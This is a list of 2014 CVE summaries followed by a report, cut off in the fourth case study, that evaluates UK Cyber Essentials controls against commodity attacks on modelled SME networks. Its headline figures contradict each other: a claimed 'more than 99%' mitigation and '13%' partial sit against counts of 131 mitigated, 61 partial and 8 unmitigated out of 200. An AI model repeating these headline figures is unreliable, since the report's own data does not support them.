CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses


Executive Summary

Findings

This report assesses the Cyber Essentials controls' effectiveness in mitigating cyber-threats.

Two hundred randomly selected internet-originating vulnerabilities are analysed for mitigation across four SME networks, with and without the Cyber Essentials controls in place. A network built from survey responses is used to assess the typicality of the SME networks, as well as to develop a broader understanding of typical SME network configurations and security practice.

The aggregated results show that without the Cyber Essentials controls none of the attacks assessed were mitigated on any network. This, more than anything else, should be understood by SMEs: taking no action to combat cyber threats simply isn't an option.

With the CE tools, more than 99% of the vulnerabilities in the SMEs interviewed were mitigated, as shown in the figure below, which depicts the aggregated results across all cases studied. The approx. 13% of exploits only partially mitigated rely on hardware or software vendors releasing patches promptly and effectively to combat any vulnerabilities.

Once the vendor has released a security patch, the Patch Management component of Cyber Essentials ensures that the system returns to a secure state. However, until a patch is released the vulnerability remains in the network. For this reason, SMEs should frequently consider what services or software are installed, whether they are necessary, and whether a more secure alternative is available.

The few vulnerabilities not mitigated by Cyber Essentials remain so because of fundamental hard-coded flaws in hardware or software that cannot be updated or patched to a secure state.

Figure 1: Cyber Essentials Aggregated Vulnerability Mitigation Results

Recommendations

Although the Cyber Essentials tools have been shown to successfully mitigate the vast majority of the attacks assessed, it is important to note that only 'commodity-level' exploits (as defined by the Cyber Essentials Framework)[10] viable for a remote attack have been considered.

The scope of this report does not address vulnerability to insider threats, social engineering, physically proximate attackers or other targeted attacks; it may be recommended that a follow-up study with a wider scope be carried out to investigate the risks from other forms of attack with the use of Cyber Essentials.

The '10 Steps to Cyber Security' report published by CESG[2] highlights that in order to maximise the security of a network it is essential not only to consider the prevention of attacks with the use of tools, but also to ensure that all employees are adequately educated in network security and treated with scrutiny through access logs and data-loss-prevention schemes, in order to achieve a secure business in the face of potential local and remote attacks. We would recommend that, especially for larger organisations, additional security measures such as these be put in place.

For hardware or software identified as inherently flawed, resulting in unmitigatable vulnerabilities, our recommendation is that these pieces of software or hardware be avoided at all costs when developing an SME network. In addition, a global list of unsafe products could be collectively developed and made publicly available. This relates to our last recommendation of integrating Cyber Essentials further with collective security approaches such as the Cyber-security Information Sharing Partnership (CiSP)[4]. These approaches keep SMEs up to date with the latest information about vulnerabilities and other cyber-threat information.


Introduction

Cyber Essentials was introduced as a government funded scheme, first published in April 2014, as an interest of national security to bolster UK security in cyberspace. The Cyber Essentials scheme was developed in collaboration with the Information Assurance for Small and Medium Enterprises (IASME) consortium, the Information Security Forum (ISF) and the British Standards Institution (BSI) as a set of basic technical security controls for organisations to utilize for the mitigation of the 'bottom 80%' of remote cyber-threats[3].

The scheme, built to provide an implementable version of the 10 Steps to Cyber Security[1], was released as part of the 2011 UK Cyber Security Strategy[16] and is being backed by the UK government as an organisational standard. Thus far it has been adopted by several large organisations, including Vodafone, Hewlett-Packard (HP), BAE Systems, Virgin Media and Barclays[5].

The Cyber Essentials accreditation has been made mandatory from October 1st 2014 for all suppliers of government contracts involving “the handling of sensitive and personal information and provision of certain technical products and services”[17].

The Cyber Essentials security controls are summarised as follows[7]:

Firewalls and Gateways
These are devices designed to prevent unauthorised access to or from private networks, but good setup of these devices, either in hardware or software form, is important for them to be fully effective.

Secure configuration
Ensuring that systems are configured in the most secure way for the needs of the organisation.

Access control
Ensuring that only those who should have access to systems have access, and at the appropriate level.

Malware protection
Ensuring that virus and malware protection is installed and is up to date.

Patch management
Ensuring that the latest supported version of applications is used and all the necessary patches supplied by the vendor have been applied.

Figure 2: Cyber Essentials Security Tools

The intended scope of Cyber Essentials is outlined in the Cyber Essentials Scheme Assurance Framework[10]. This states that the CE controls are considered applicable to all sizes of enterprise as a base level of protection against cyber-attacks, upon which individual organisations may build with further tools, network devices or protocols for the mitigation of targeted attacks. The CE Scheme is clear in its inclusion of 'Bring Your Own Device' network setups in scope, as well as Cloud-based services and off-the-shelf web applications. Bespoke IT systems, such as those in manufacturing and retail, are applicable to CE but hold additional vulnerabilities due to their nature that are not to be considered.

Aims

The purpose of this report is to investigate the effectiveness of the Cyber Essentials controls in mitigating 'commodity-level' attacks attempting to exploit vulnerabilities in Small and Medium Enterprise (SME) networks.

A commodity-level attack has been defined by CESG[8] as:

Any unauthenticated remote attack exploiting a known vulnerability with the use of tools and techniques openly available for download or purchase on the internet - and that do not require extensive specialist knowledge to conduct.¹

To effectively assess Cyber Essentials it is first necessary to understand the typical network configurations of SMEs. Interviews with SMEs were carried out to build abstracted network models, and a survey has been conducted to build a broader picture of SME network deployments. The survey results will help to develop our understanding of current security practice and cyber-awareness, as well as to build a general-case SME network with which to analyse the typicality of the SMEs interviewed.

The networks modelled from collected data are to be considered with and without the use of the Cyber Essentials security controls, to comparatively establish the protection granted by the adoption of the CE scheme.

¹ This includes attacks utilising pen-testing software such as Metasploit, Kali and the Poison Ivy remote access tool, which are capable of scanning network nodes for publicly known vulnerabilities in the operating system, applications or services in use.


Methodology

The scheme of work for this report has been split into the following sections:

• Collection of data through interviews and a survey regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper models to be analysed.

• Composition of a list of suitable vulnerabilities that contains applicable methods by which remote attackers can exploit commodity-level attacks.

• Assessment of vulnerability mitigation for SME networks with and without the use of the CE Tools.

Data Collection

In order to analyse the effectiveness of the Cyber Essentials Security Tools, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews and abstracted to reduce redundant complexity and remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.

Interviews

The interviews were composed with the goal of first understanding the layout or topology of the network deployed by an SME. To then build on the network configuration, it was important to understand how the network is used: where remote connections take place, how local services are utilised, and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.

Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches, and how often updates are rolled out.

Survey

The Survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the Interviews. This included details of the number of workstations at the SME (to gauge its size), the local and remote services available, the operating systems used on the service providers and workstations, the current security policies in place and the respondents' awareness of the CE Scheme.

Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster [9], and another publicly to closed groups of security-interested SME representatives.

Vulnerabilities

A total of 200 random vulnerabilities have been taken in equal numbers from two annual vulnerability lists, CVE-2013 and CVE-2014, published by Mitre². Any vulnerabilities found to be unsuitable for analysis have been replaced by a new candidate.

In this report we use the Mitre.org definition of a vulnerability, which they state as:

An information security "vulnerability" is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely "open" security policies in which all users are trusted, or where there is no consideration of risk to the system).

(As shown on Mitre.org's Terminology page [6] in March '15)

² CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security.

Figure 3 Methodology for Assessing Cyber Essentials

To warrant a CVE entry in the Mitre list, individual vulnerabilities must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;

• allows an attacker to access data that is contrary to the specified access restrictions for that data;

• allows an attacker to pose as another entity;

• allows an attacker to conduct a denial of service.

High-Profile Vulnerabilities

Three specific high-profile vulnerabilities were also taken in addition to the randomly chosen 200, and have been assessed to establish to what extent the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.

Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with the respective potential to harm operations.

Mitigation Assessment

The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated or not mitigated. The results are double-vetted to ensure correctness.

For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use or likely in use (based on the SME's practice) are deemed applicable to the network.
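The applicability rule and per-control verdicts described above can be made concrete as a small model. This is an added example, not the authors' assessment tooling: the CVE identifiers, products, networks and per-control verdicts below are constructed placeholders chosen to show the three outcomes (mitigated, partially mitigated, not mitigated) and the per-network summaries the report presents.

```python
"""Added example: a model of the report's applicability and mitigation assessment.
Not the authors' tooling; every identifier, product and verdict below is a
constructed placeholder (assumption), not data from the report."""
from collections import Counter
from dataclasses import dataclass

# The five Cyber Essentials controls considered for each vulnerability.
CONTROLS = ("firewall", "secure_config", "access_control", "anti_malware", "patch_mgmt")
MITIGATED, PARTIAL, NONE = "mitigated", "partially mitigated", "not mitigated"
RANK = {MITIGATED: 2, PARTIAL: 1, NONE: 0}


@dataclass
class Vulnerability:
    cve: str            # placeholder identifier (constructed)
    kind: str           # "hardware" or "software"
    vendor: str
    product: str
    verdicts: dict      # control -> MITIGATED / PARTIAL / NONE (assumed values)


@dataclass(frozen=True)
class Network:
    name: str
    hardware_vendors: frozenset   # vendors of devices on site
    software_in_use: frozenset    # software known to be in use
    software_likely: frozenset    # software likely in use, judged from the SME's practice


def applicable(vuln: Vulnerability, net: Network) -> bool:
    """Applicability rule from the Methodology: a hardware CVE applies if the
    network uses a like-product from the same vendor; a software CVE applies
    only if that software is in use or likely in use."""
    if vuln.kind == "hardware":
        return vuln.vendor in net.hardware_vendors
    return vuln.product in net.software_in_use or vuln.product in net.software_likely


def overall_verdict(vuln: Vulnerability, with_ce: bool = True) -> str:
    """Without the controls nothing is mitigated; with them, the best outcome
    that any single control component achieves is taken."""
    if not with_ce:
        return NONE
    return max((vuln.verdicts.get(c, NONE) for c in CONTROLS), key=RANK.__getitem__)


def assess(vulns, net: Network, with_ce: bool = True) -> dict:
    """Per-network summary in the shape of the report's SME figures: how many
    of the CVEs apply, and how they split across the three outcomes."""
    applicable_vulns = [v for v in vulns if applicable(v, net)]
    counts = Counter(overall_verdict(v, with_ce) for v in applicable_vulns)
    return {"applicable": len(applicable_vulns),
            MITIGATED: counts[MITIGATED], PARTIAL: counts[PARTIAL], NONE: counts[NONE]}


def control_contribution(vulns) -> dict:
    """Share of the list each control fully mitigates on its own, the kind of
    figure used to rank patch management first and anti-malware last."""
    total = len(vulns)
    return {c: sum(v.verdicts.get(c) == MITIGATED for v in vulns) / total for c in CONTROLS}


# Constructed sample list: one software CVE per outcome plus a hardware device flaw.
SAMPLE_VULNS = [
    Vulnerability("CVE-PLACEHOLDER-1", "software", "BrowserCo", "browser",
                  {"patch_mgmt": MITIGATED, "anti_malware": PARTIAL}),
    Vulnerability("CVE-PLACEHOLDER-2", "software", "PluginCo", "plugin",
                  {"patch_mgmt": PARTIAL}),          # vendor fix not yet released
    Vulnerability("CVE-PLACEHOLDER-3", "hardware", "RouterCo", "router-x1",
                  {}),                               # inherent flaw, no patch possible
    Vulnerability("CVE-PLACEHOLDER-4", "software", "SSLCo", "tls-library",
                  {"patch_mgmt": MITIGATED, "firewall": PARTIAL, "access_control": PARTIAL}),
]

# Constructed networks loosely shaped like the report's SME-1 (local servers,
# several browsers) and SME-4 (cloud-only, very little local software).
SME1 = Network("SME-1", frozenset({"RouterCo"}), frozenset({"browser", "tls-library"}),
               frozenset({"plugin"}))
SME4 = Network("SME-4", frozenset({"OtherCo"}), frozenset({"browser"}), frozenset())

if __name__ == "__main__":
    for net in (SME1, SME4):
        print(net.name, "without CE:", assess(SAMPLE_VULNS, net, with_ce=False))
        print(net.name, "with CE:   ", assess(SAMPLE_VULNS, net))
    print(control_contribution(SAMPLE_VULNS))
```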


Analysis

The analysis of data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in software and hardware used in each SME network configuration is included.

The full table for the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.

Full Vulnerabilities Assessment

Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials Security Tools, 61 vulnerabilities were partially mitigated and 8 were not mitigated.

Figure 4 Percentage of Full Vulnerabilities List Mitigated

Partially Mitigated: 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, but they will be mitigated once a security fix has been released. Whatever level of security tools is deployed on a network, the security involved in using third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to quickly respond to security breaches as they become apparent with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary, or whether there are more suitable and potentially more secure solutions available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In a case such as this, website blacklisting is the only defence against the vulnerabilities.

Not Mitigated - Secure Configuration: Some vulnerabilities have been found to be unmitigatable using the CE controls; in each of the found cases this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For these devices that are fundamentally flawed from a cyber-security standpoint, it can be that no level of security tools on top of the network can aid in mitigation; rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.

Case Studies

Four SMEs were interviewed to build paper-models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.

SME Network One - Finance Sector

Physical Infrastructure: The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.

Figure 5 SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services: At the head office site, a Windows file server (SAMBA) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, and firewall rules have been put in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers, and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.


User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (technically this is not permitted by policy, but the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems: Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6 SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of the browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, opening them up multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.

SME Network Two - Specialist Group

Physical Infrastructure: The second SME participant employs 20-25 people, based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators, via SSH.

Network equipment includes an external Dell PowerEdge Server, four TP-Link switch access points and a TP-Link DHCP router.

Figure 7 SME-2 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices run OS X, Windows XP, Windows 7 and Windows 8, with auto-updates enabled.

Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: Email, Files and Database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server, database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8 SME-2 Vulnerability Mitigation

The specialist SME had the fewest overall potential vulnerabilities, largely owing to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed on to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.

SME Network Three - Web Development

Physical Infrastructure: SME-3 employs 10 workers, based in one building.

Employees are restricted from using their own devices unless the device is validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge Server, one TP-Link switch access point and a TP-Link DHCP router.

Figure 9 SME-3 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices run OS X, Windows 7 and Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: Email, Files and Database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access, and commonly use all major browsers for compatibility testing.

Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and Cloud Service Access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.

Figure 10 SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers on various versions, to test and build a customer's website, means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place:

When working on alternative browsers, employees should only access client pages where the developer has control of the web content.

SME Network Four - Hotel Services

Figure 11 SME-4 Network

Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops, running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services: No local servers are present to provide any service to employees or guests on the network.

File storage is provided through online services, including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS mainly).

